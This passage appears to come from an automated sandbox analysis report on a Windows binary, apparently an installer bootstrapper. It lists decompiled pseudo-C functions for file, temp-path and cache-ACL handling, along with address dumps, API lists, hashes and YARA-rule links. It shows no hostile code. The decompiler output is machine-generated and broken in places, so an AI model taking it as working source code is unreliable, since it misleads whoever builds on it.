					E004300D9(_t68);
					L54:
					return _t88;
				}
			}





























                                                                                                                                                                  0x00436b8e
                                                                                                                                                                  0x00436b90
                                                                                                                                                                  0x00436b93
                                                                                                                                                                  0x00436b99
                                                                                                                                                                  0x00436bba
                                                                                                                                                                  0x00436bbc
                                                                                                                                                                  0x00436bcb
                                                                                                                                                                  0x00436bce
                                                                                                                                                                  0x00436bd0
                                                                                                                                                                  0x00436be1
                                                                                                                                                                  0x00436be4
                                                                                                                                                                  0x00436c11
                                                                                                                                                                  0x00436c13
                                                                                                                                                                  0x00436c16
                                                                                                                                                                  0x00436c19
                                                                                                                                                                  0x00436c61
                                                                                                                                                                  0x00436c61
                                                                                                                                                                  0x00436c66
                                                                                                                                                                  0x00436c6c
                                                                                                                                                                  0x00436c6e
                                                                                                                                                                  0x00436c9f
                                                                                                                                                                  0x00436ca2
                                                                                                                                                                  0x00436ceb
                                                                                                                                                                  0x00436ceb
                                                                                                                                                                  0x00436cef
                                                                                                                                                                  0x00436d17
                                                                                                                                                                  0x00436d1a
                                                                                                                                                                  0x00436d1f
                                                                                                                                                                  0x00436d21
                                                                                                                                                                  0x00436d23
                                                                                                                                                                  0x00436d25
                                                                                                                                                                  0x00436d26
                                                                                                                                                                  0x00436d28
                                                                                                                                                                  0x00436d2a
                                                                                                                                                                  0x00436cf6
                                                                                                                                                                  0x00436cf6
                                                                                                                                                                  0x00436cf9
                                                                                                                                                                  0x00436cfc
                                                                                                                                                                  0x00436d65
                                                                                                                                                                  0x00436d67
                                                                                                                                                                  0x00436d0b
                                                                                                                                                                  0x00436d0e
                                                                                                                                                                  0x00436d10
                                                                                                                                                                  0x00436e27
                                                                                                                                                                  0x00436e27
                                                                                                                                                                  0x00436e2a
                                                                                                                                                                  0x00436e2d
                                                                                                                                                                  0x00436e30
                                                                                                                                                                  0x00436e30
                                                                                                                                                                  0x00436e36
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436e36
                                                                                                                                                                  0x00436d71
                                                                                                                                                                  0x00436d73
                                                                                                                                                                  0x00436d75
                                                                                                                                                                  0x00436d89
                                                                                                                                                                  0x00436d89
                                                                                                                                                                  0x00436d8b
                                                                                                                                                                  0x00436d8d
                                                                                                                                                                  0x00436d90
                                                                                                                                                                  0x00436d97
                                                                                                                                                                  0x00436d97
                                                                                                                                                                  0x00436da5
                                                                                                                                                                  0x00436da7
                                                                                                                                                                  0x00436da9
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436dbd
                                                                                                                                                                  0x00436dc3
                                                                                                                                                                  0x00436dc5
                                                                                                                                                                  0x00436def
                                                                                                                                                                  0x00436dfe
                                                                                                                                                                  0x00436e00
                                                                                                                                                                  0x00436e08
                                                                                                                                                                  0x00436e0a
                                                                                                                                                                  0x00436e0a
                                                                                                                                                                  0x00436e18
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436e18
                                                                                                                                                                  0x00436dca
                                                                                                                                                                  0x00436dcd
                                                                                                                                                                  0x00436dd1
                                                                                                                                                                  0x00436dd4
                                                                                                                                                                  0x00436d95
                                                                                                                                                                  0x00436d95
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436d95
                                                                                                                                                                  0x00436dd6
                                                                                                                                                                  0x00436dd8
                                                                                                                                                                  0x00436de4
                                                                                                                                                                  0x00436de9
                                                                                                                                                                  0x00436deb
                                                                                                                                                                  0x00436dda
                                                                                                                                                                  0x00436dda
                                                                                                                                                                  0x00436dda
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436dd8
                                                                                                                                                                  0x00436e1d
                                                                                                                                                                  0x00436e1f
                                                                                                                                                                  0x00436e22
                                                                                                                                                                  0x00436e22
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436e1f
                                                                                                                                                                  0x00436d77
                                                                                                                                                                  0x00436d7c
                                                                                                                                                                  0x00436d7d
                                                                                                                                                                  0x00436d7f
                                                                                                                                                                  0x00436c90
                                                                                                                                                                  0x00436c90
                                                                                                                                                                  0x00436c95
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436c95
                                                                                                                                                                  0x00436cfe
                                                                                                                                                                  0x00436d00
                                                                                                                                                                  0x00436d4d
                                                                                                                                                                  0x00436d4f
                                                                                                                                                                  0x00436d51
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436d53
                                                                                                                                                                  0x00436d58
                                                                                                                                                                  0x00436d59
                                                                                                                                                                  0x00436d5b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436d5b
                                                                                                                                                                  0x00436d04
                                                                                                                                                                  0x00436d09
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436d09
                                                                                                                                                                  0x00436d2c
                                                                                                                                                                  0x00436d33
                                                                                                                                                                  0x00436d33
                                                                                                                                                                  0x00436d38
                                                                                                                                                                  0x00436d39
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436d39
                                                                                                                                                                  0x00436d2e
                                                                                                                                                                  0x00436d31
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436d31
                                                                                                                                                                  0x00436cf1
                                                                                                                                                                  0x00436cf4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436cf4
                                                                                                                                                                  0x00436ca4
                                                                                                                                                                  0x00436ca9
                                                                                                                                                                  0x00436cac
                                                                                                                                                                  0x00436cbf
                                                                                                                                                                  0x00436cc4
                                                                                                                                                                  0x00436cca
                                                                                                                                                                  0x00436ccd
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436ccf
                                                                                                                                                                  0x00436cda
                                                                                                                                                                  0x00436cdc
                                                                                                                                                                  0x00436cdf
                                                                                                                                                                  0x00436ce1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436ce3
                                                                                                                                                                  0x00436ce4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436ce4
                                                                                                                                                                  0x00436cae
                                                                                                                                                                  0x00436cb5
                                                                                                                                                                  0x00436cb5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436cb5
                                                                                                                                                                  0x00436cb0
                                                                                                                                                                  0x00436cb3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436cb3
                                                                                                                                                                  0x00436c70
                                                                                                                                                                  0x00436c7b
                                                                                                                                                                  0x00436c7d
                                                                                                                                                                  0x00436c80
                                                                                                                                                                  0x00436c85
                                                                                                                                                                  0x00436c87
                                                                                                                                                                  0x00436c8a
                                                                                                                                                                  0x00436c8b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436c8b
                                                                                                                                                                  0x00436c1d
                                                                                                                                                                  0x00436c27
                                                                                                                                                                  0x00436c29
                                                                                                                                                                  0x00436c2c
                                                                                                                                                                  0x00436c31
                                                                                                                                                                  0x00436c33
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436c39
                                                                                                                                                                  0x00436c3b
                                                                                                                                                                  0x00436c5e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436c5e
                                                                                                                                                                  0x00436c3d
                                                                                                                                                                  0x00436c44
                                                                                                                                                                  0x00436c46
                                                                                                                                                                  0x00436c54
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436c54
                                                                                                                                                                  0x00436be6
                                                                                                                                                                  0x00436beb
                                                                                                                                                                  0x00436bec
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436bec
                                                                                                                                                                  0x00436bd2
                                                                                                                                                                  0x00436bd7
                                                                                                                                                                  0x00436bd8
                                                                                                                                                                  0x00436bbe
                                                                                                                                                                  0x00436bbe
                                                                                                                                                                  0x00436bc3
                                                                                                                                                                  0x00436bc4
                                                                                                                                                                  0x00436bc4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00436b9b
                                                                                                                                                                  0x00436b9b
                                                                                                                                                                  0x00436ba0
                                                                                                                                                                  0x00436ba1
                                                                                                                                                                  0x00436ba6
                                                                                                                                                                  0x00436ba6
                                                                                                                                                                  0x00436bab
                                                                                                                                                                  0x00436bad
                                                                                                                                                                  0x00436e38
                                                                                                                                                                  0x00436e3c
                                                                                                                                                                  0x00436e3c

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000080,00000000,000000F8,00000000,00000000,?,00000000,?,?), ref: 00436C05
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00436C1B
                                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 00436C66
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00436C70
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00436E30
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLast$CloseCreateHandleSize
                                                                                                                                                                  • String ID: fileutil.cpp
                                                                                                                                                                  • API String ID: 3555958901-2967768451
                                                                                                                                                                  • Opcode ID: 9449c61ab784c35bbdeda08b47bf116130828b945e1fece7cf01655c0f7bcb39
                                                                                                                                                                  • Instruction ID: eea59d09bc76e9811a59d702b1a09118f995223fbb5b3c1e81295b2dab5685d5
                                                                                                                                                                  • Opcode Fuzzy Hash: 9449c61ab784c35bbdeda08b47bf116130828b945e1fece7cf01655c0f7bcb39
                                                                                                                                                                  • Instruction Fuzzy Hash: E3710631A00212BBDB218E298C45B6F76E8EB48750F12A12BFD55EB290D67CDD008A9D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0043167E, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 197sleepfiletimeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                                  			E0043167E(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, void** _a24) {
				signed int _v8;
				short _v528;
				struct _SYSTEMTIME _v544;
				char _v548;
				WCHAR* _v552;
				char _v556;
				signed int _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				void** _v572;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t49;
				signed short _t60;
				void* _t63;
				void* _t82;
				void** _t87;
				void* _t88;
				signed short _t89;
				void* _t90;
				signed short _t91;
				intOrPtr _t95;
				void* _t97;
				signed int _t103;
				void* _t108;
				intOrPtr* _t109;
				signed short _t116;
				signed int _t117;
				void* _t118;
				void* _t119;

				_t98 = __ecx;
				_t49 =  *0x4560d0; // 0xae480e18
				_v8 = _t49 ^ _t117;
				_v560 = _a12;
				_t95 = _a8;
				_t109 = _a4;
				_v564 = _a16;
				_v568 = _a20;
				_push(0x208);
				_v572 = _a24;
				_push(0);
				_push( &_v528);
				E004267C0(_t95, __ecx, 0, _t109, __eflags);
				_v548 = 0;
				_v556 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t119 = _t118 + 0xc;
				_t108 =  &_v544 | 0xffffffff;
				_v552 = 0;
				if(_t109 == 0 ||  *_t109 == 0) {
					_t60 = GetTempPathW(0x104,  &_v528);
					__eflags = _t60;
					if(_t60 != 0) {
						_push( &_v548);
						_push(_t95);
						_push( &_v528);
						goto L6;
					}
					_t91 = GetLastError();
					__eflags = _t91;
					_t116 =  <=  ? _t91 : _t91 & 0x0000ffff | 0x80070000;
					__eflags = _t116;
					_t110 =  >=  ? 0x80004005 : _t116;
					E004300D9(0x80004005, "pathutil.cpp", 0x26d,  >=  ? 0x80004005 : _t116);
					goto L24;
				} else {
					_push( &_v548);
					_push(_t95);
					_push(_t109);
					L6:
					_t63 = E004314A9();
					_t110 = _t63;
					if(_t63 < 0) {
						L24:
						if(_v552 != 0) {
							E004380AB(_v552);
						}
						if(_v556 != 0) {
							E004380AB(_v556);
						}
						if(_v548 != 0) {
							E004380AB(_v548);
						}
						return L004267AF(_t110, _v8 ^ _t117, _t108, _t110);
					}
					if(E00431C88(_t98, _v548,  &_v556) != 0) {
						L9:
						_t97 =  !=  ? _v560 : 0x43b580;
						while(1) {
							_v560 = _v560 & 0x00000000;
							GetLocalTime( &_v544);
							_push(_v564);
							_push(0x2e);
							_t74 =  !=  ? 0x452c20 : 0x43b580;
							_push( !=  ? 0x452c20 : 0x43b580);
							_push(_t97);
							_push(_v544.wSecond & 0x0000ffff);
							_push(_v544.wMinute & 0x0000ffff);
							_push(_v544.wHour & 0x0000ffff);
							_push(_v544.wDay & 0x0000ffff);
							_push(_v544.wMonth & 0x0000ffff);
							_push(_v544.wYear & 0x0000ffff);
							_t82 = E00433CEA( &_v552, L"%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls", _v548);
							_t110 = _t82;
							_t119 = _t119 + 0x30;
							if(_t82 < 0) {
								break;
							}
							_t108 = CreateFileW(_v552, 0x40000000, 1, 0, 1, 0x80, 0);
							if(_t108 != 0xffffffff) {
								L18:
								_t86 = _v568;
								if(_v568 == 0) {
									L20:
									_t87 = _v572;
									if(_t87 != 0) {
										 *_t87 = _t108;
										_t108 = _t108 | 0xffffffff;
									}
									break;
								}
								_t88 = E00433F88(_t86, _v552, 0);
								_t110 = _t88;
								if(_t88 < 0) {
									break;
								}
								goto L20;
							}
							_t89 = GetLastError();
							if(_t89 == 0x50 || _t89 == 5) {
								Sleep(0x64);
								_t89 = 0;
								_t103 = 1;
							} else {
								_t103 = _v560;
							}
							_t110 =  <=  ? _t89 : _t89 & 0x0000ffff | 0x80070000;
							if(( <=  ? _t89 : _t89 & 0x0000ffff | 0x80070000) < 0) {
								goto L24;
							} else {
								if(_t103 != 0) {
									continue;
								}
								goto L18;
							}
						}
						if(_t108 != 0xffffffff) {
							CloseHandle(_t108);
						}
						goto L24;
					}
					_t90 = E00437850(_v556, _t70);
					_t110 = _t90;
					if(_t90 < 0) {
						goto L24;
					}
					goto L9;
				}
			}


































                                                                                                                                                                  0x0043167e
                                                                                                                                                                  0x00431687
                                                                                                                                                                  0x0043168e
                                                                                                                                                                  0x00431694
                                                                                                                                                                  0x0043169e
                                                                                                                                                                  0x004316a2
                                                                                                                                                                  0x004316a5
                                                                                                                                                                  0x004316af
                                                                                                                                                                  0x004316b8
                                                                                                                                                                  0x004316bd
                                                                                                                                                                  0x004316cb
                                                                                                                                                                  0x004316cc
                                                                                                                                                                  0x004316cd
                                                                                                                                                                  0x004316d2
                                                                                                                                                                  0x004316d8
                                                                                                                                                                  0x004316e6
                                                                                                                                                                  0x004316e7
                                                                                                                                                                  0x004316e8
                                                                                                                                                                  0x004316e9
                                                                                                                                                                  0x004316ec
                                                                                                                                                                  0x004316ef
                                                                                                                                                                  0x004316f2
                                                                                                                                                                  0x004316fa
                                                                                                                                                                  0x00431718
                                                                                                                                                                  0x0043171e
                                                                                                                                                                  0x00431720
                                                                                                                                                                  0x0043175b
                                                                                                                                                                  0x0043175c
                                                                                                                                                                  0x00431763
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00431763
                                                                                                                                                                  0x00431722
                                                                                                                                                                  0x00431731
                                                                                                                                                                  0x00431733
                                                                                                                                                                  0x0043173b
                                                                                                                                                                  0x0043173d
                                                                                                                                                                  0x0043174b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00431701
                                                                                                                                                                  0x00431707
                                                                                                                                                                  0x00431708
                                                                                                                                                                  0x00431709
                                                                                                                                                                  0x00431764
                                                                                                                                                                  0x00431764
                                                                                                                                                                  0x00431769
                                                                                                                                                                  0x0043176d
                                                                                                                                                                  0x004318d0
                                                                                                                                                                  0x004318d7
                                                                                                                                                                  0x004318df
                                                                                                                                                                  0x004318df
                                                                                                                                                                  0x004318eb
                                                                                                                                                                  0x004318f3
                                                                                                                                                                  0x004318f3
                                                                                                                                                                  0x004318ff
                                                                                                                                                                  0x00431907
                                                                                                                                                                  0x00431907
                                                                                                                                                                  0x0043191c
                                                                                                                                                                  0x0043191c
                                                                                                                                                                  0x00431787
                                                                                                                                                                  0x0043179f
                                                                                                                                                                  0x004317ac
                                                                                                                                                                  0x004317af
                                                                                                                                                                  0x004317af
                                                                                                                                                                  0x004317bd
                                                                                                                                                                  0x004317c9
                                                                                                                                                                  0x004317ca
                                                                                                                                                                  0x004317da
                                                                                                                                                                  0x004317dd
                                                                                                                                                                  0x004317e5
                                                                                                                                                                  0x004317e6
                                                                                                                                                                  0x004317ee
                                                                                                                                                                  0x004317f6
                                                                                                                                                                  0x004317fe
                                                                                                                                                                  0x00431806
                                                                                                                                                                  0x0043180e
                                                                                                                                                                  0x00431821
                                                                                                                                                                  0x00431826
                                                                                                                                                                  0x00431828
                                                                                                                                                                  0x0043182d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00431851
                                                                                                                                                                  0x00431856
                                                                                                                                                                  0x00431897
                                                                                                                                                                  0x00431897
                                                                                                                                                                  0x0043189f
                                                                                                                                                                  0x004318b5
                                                                                                                                                                  0x004318b5
                                                                                                                                                                  0x004318bd
                                                                                                                                                                  0x004318bf
                                                                                                                                                                  0x004318c1
                                                                                                                                                                  0x004318c1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004318bd
                                                                                                                                                                  0x004318aa
                                                                                                                                                                  0x004318af
                                                                                                                                                                  0x004318b3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004318b3
                                                                                                                                                                  0x00431858
                                                                                                                                                                  0x00431861
                                                                                                                                                                  0x0043186a
                                                                                                                                                                  0x00431872
                                                                                                                                                                  0x00431874
                                                                                                                                                                  0x00431877
                                                                                                                                                                  0x00431877
                                                                                                                                                                  0x00431877
                                                                                                                                                                  0x00431888
                                                                                                                                                                  0x0043188d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0043188f
                                                                                                                                                                  0x00431891
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00431891
                                                                                                                                                                  0x0043188d
                                                                                                                                                                  0x004318c7
                                                                                                                                                                  0x004318ca
                                                                                                                                                                  0x004318ca
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004318c7
                                                                                                                                                                  0x00431790
                                                                                                                                                                  0x00431795
                                                                                                                                                                  0x00431799
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00431799

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,?,00000001,00000000,00000009), ref: 00431718
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00431722
                                                                                                                                                                  • GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 004317BD
                                                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 0043184B
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00431858
                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 0043186A
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004318CA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
                                                                                                                                                                  • String ID: ,E$%ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
                                                                                                                                                                  • API String ID: 3480017824-3983667056
                                                                                                                                                                  • Opcode ID: ab917cedbdd24ff18d86546282577be4c56a3b33bc174a13acbeb6f70cbc116a
                                                                                                                                                                  • Instruction ID: c002f17cd6b9caa630ec2a389d5f59f0597f3cedcc4fe586e16a870ed1bc83b1
                                                                                                                                                                  • Opcode Fuzzy Hash: ab917cedbdd24ff18d86546282577be4c56a3b33bc174a13acbeb6f70cbc116a
                                                                                                                                                                  • Instruction Fuzzy Hash: CE616A71901229ABDB249BA5DC48BAFB7F8EF0C711F1011A6F905E71A0D7789D84CF58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00402BF0, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 139COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastVersion
                                                                                                                                                                  • String ID: Failed to get OS info.$Failed to set variant value.$variable.cpp
                                                                                                                                                                  • API String ID: 305913169-1971907631
                                                                                                                                                                  • Opcode ID: 35c09f2212805f310ab3577de3f8654f1ff02d6c205b15a8912165344749f862
                                                                                                                                                                  • Instruction ID: 9a6f724705f57ef5a22e9559695505b0383d100e24c63a5ca905ca124a6c5efc
                                                                                                                                                                  • Opcode Fuzzy Hash: 35c09f2212805f310ab3577de3f8654f1ff02d6c205b15a8912165344749f862
                                                                                                                                                                  • Instruction Fuzzy Hash: 8541F971A04224BAE7209A75DD0EFEB7AB8EF8D710F00056BB545F71C0D67C8E418AA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00412697, Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 126COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 48%
                                                                                                                                                                  			E00412697(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				char _v40;
				char _v72;
				char _v104;
				char _v108;
				char _v136;
				signed int _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t18;
				void* _t23;
				signed short _t31;
				void* _t40;
				void* _t41;
				intOrPtr _t46;
				intOrPtr* _t47;
				void* _t48;
				signed short _t52;
				signed short _t56;
				signed int _t57;

				_t42 = __ecx;
				_t18 =  *0x4560d0; // 0xae480e18
				_v8 = _t18 ^ _t57;
				_t46 = _a4;
				_push(0x80);
				_push(0);
				_push( &_v136);
				E004267C0(_t40, __ecx, _t46, _t48, __eflags);
				_v140 = _v140 & 0x00000000;
				_t23 = E00412469(__ecx, __eflags, 0x1a, 0x1f01ff,  &_v136);
				_t41 = 4;
				if(_t23 >= 0) {
					__eflags = E00412469(__ecx, __eflags, 0x16, 0x1f01ff,  &_v104);
					if(__eflags >= 0) {
						_t8 =  &_v72; // 0x412353
						__eflags = E00412469(_t42, __eflags, 1, 0xa0000000, _t8);
						if(__eflags >= 0) {
							_t52 = E00412469(_t42, __eflags, 0x1b, 0xa0000000,  &_v40);
							__eflags = _t52;
							if(_t52 >= 0) {
								_t31 =  &_v136;
								__imp__SetEntriesInAclW(_t41, _t31, 0,  &_v140);
								__eflags = _t31;
								if(_t31 == 0) {
									_t52 = E004380B4(_t42, _t46, 1, 0x80000005, _v108, 0, _v140, 0, 3, 0x7d0);
									__eflags = _t52;
									if(_t52 < 0) {
										_push(_t46);
										_push("Failed to secure cache path: %ls");
										goto L12;
									}
								} else {
									__eflags = _t31;
									_t56 =  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
									__eflags = _t56;
									_t52 =  >=  ? 0x80004005 : _t56;
									E004300D9(0x80004005, "cache.cpp", 0x5a0, _t52);
									_push(_t46);
									_push("Failed to create ACL to secure cache path: %ls");
									goto L12;
								}
							} else {
								_push(_t46);
								_push("Failed to allocate access for Users group to path: %ls");
								goto L12;
							}
						} else {
							_push(_t46);
							_push("Failed to allocate access for Everyone group to path: %ls");
							goto L12;
						}
					} else {
						_push(_t46);
						_push("Failed to allocate access for SYSTEM group to path: %ls");
						goto L12;
					}
				} else {
					_push(_t46);
					_push("Failed to allocate access for Administrators group to path: %ls");
					L12:
					_push(_t52);
					E00430A57();
				}
				if(_v140 != 0) {
					LocalFree(_v140);
				}
				_t47 =  &_v108;
				do {
					if( *_t47 != 0) {
						E00431137( *_t47);
					}
					_t47 = _t47 + 0x20;
					_t41 = _t41 - 1;
				} while (_t41 != 0);
				return L004267AF(_t52, _v8 ^ _t57, _t47, _t52);
			}
























                                                                                                                                                                  0x00412697
                                                                                                                                                                  0x004126a0
                                                                                                                                                                  0x004126a7
                                                                                                                                                                  0x004126ad
                                                                                                                                                                  0x004126b0
                                                                                                                                                                  0x004126bb
                                                                                                                                                                  0x004126bd
                                                                                                                                                                  0x004126be
                                                                                                                                                                  0x004126c3
                                                                                                                                                                  0x004126db
                                                                                                                                                                  0x004126e4
                                                                                                                                                                  0x004126e7
                                                                                                                                                                  0x00412706
                                                                                                                                                                  0x00412708
                                                                                                                                                                  0x00412715
                                                                                                                                                                  0x00412727
                                                                                                                                                                  0x00412729
                                                                                                                                                                  0x00412746
                                                                                                                                                                  0x00412748
                                                                                                                                                                  0x0041274a
                                                                                                                                                                  0x0041275e
                                                                                                                                                                  0x00412766
                                                                                                                                                                  0x0041276c
                                                                                                                                                                  0x0041276e
                                                                                                                                                                  0x004127bf
                                                                                                                                                                  0x004127c1
                                                                                                                                                                  0x004127c3
                                                                                                                                                                  0x004127c5
                                                                                                                                                                  0x004127c6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004127c6
                                                                                                                                                                  0x00412770
                                                                                                                                                                  0x00412779
                                                                                                                                                                  0x0041277b
                                                                                                                                                                  0x00412783
                                                                                                                                                                  0x00412785
                                                                                                                                                                  0x00412793
                                                                                                                                                                  0x00412798
                                                                                                                                                                  0x00412799
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00412799
                                                                                                                                                                  0x0041274c
                                                                                                                                                                  0x0041274c
                                                                                                                                                                  0x0041274d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041274d
                                                                                                                                                                  0x0041272b
                                                                                                                                                                  0x0041272b
                                                                                                                                                                  0x0041272c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041272c
                                                                                                                                                                  0x0041270a
                                                                                                                                                                  0x0041270a
                                                                                                                                                                  0x0041270b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041270b
                                                                                                                                                                  0x004126e9
                                                                                                                                                                  0x004126e9
                                                                                                                                                                  0x004126ea
                                                                                                                                                                  0x004127cb
                                                                                                                                                                  0x004127cb
                                                                                                                                                                  0x004127cc
                                                                                                                                                                  0x004127d1
                                                                                                                                                                  0x004127db
                                                                                                                                                                  0x004127e3
                                                                                                                                                                  0x004127e3
                                                                                                                                                                  0x004127e9
                                                                                                                                                                  0x004127ec
                                                                                                                                                                  0x004127ef
                                                                                                                                                                  0x004127f3
                                                                                                                                                                  0x004127f3
                                                                                                                                                                  0x004127f8
                                                                                                                                                                  0x004127fb
                                                                                                                                                                  0x004127fb
                                                                                                                                                                  0x0041280e

                                                                                                                                                                  APIs
                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,00000001,80000005,?,00000000,00000000,00000000,00000003,000007D0), ref: 004127E3
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to allocate access for SYSTEM group to path: %ls, xrefs: 0041270B
                                                                                                                                                                  • Failed to allocate access for Administrators group to path: %ls, xrefs: 004126EA
                                                                                                                                                                  • S#A, xrefs: 00412715, 00412718
                                                                                                                                                                  • Failed to create ACL to secure cache path: %ls, xrefs: 00412799
